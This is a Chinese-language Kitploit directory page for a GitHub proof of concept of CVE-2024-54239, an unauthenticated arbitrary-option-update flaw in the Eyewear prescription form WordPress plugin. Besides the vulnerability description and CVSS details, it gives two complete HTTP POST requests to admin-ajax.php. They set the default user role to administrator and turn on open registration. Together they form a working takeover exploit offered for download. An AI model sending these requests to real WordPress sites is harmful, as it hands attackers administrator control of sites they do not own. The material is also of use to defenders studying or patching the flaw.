Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-54239 — Eyewear prescription form <= 4.0.18 - 缺失授权导致未认证的任意选项更新 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-54239
权限提升漏洞分析漏洞利用Web应用程序漏洞利用Web安全错误配置
GitHubrandomrobbiebf/cve-2024-54239

CVE-2024-54239

Eyewear prescription form <= 4.0.18 - 缺失授权导致未认证的任意选项更新

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-54239

Eyewear prescription form <= 4.0.18 - 缺少授权导致未认证的任意选项更新

描述

WordPress 的 Eyewear prescription form 插件在所有版本(包括 4.0.18)中,由于 adminSetting() 函数缺少权限检查,容易受到未经授权的数据修改攻击,进而可能导致权限提升。这使得未认证的攻击者能够更新 WordPress 站点上的任意选项。该漏洞可被利用来将注册默认角色更新为管理员并启用用户注册,从而使攻击者获得对易受影响站点的管理员用户访问权限。

详情

  • 类型: 插件
  • Slug: eyewear-prescription-form
  • 受影响版本: 4.0.18
  • CVSS 分数: 9.8
  • CVSS 评级: 严重
  • CVSS 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-54239
  • 状态: 活跃

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1
下载工具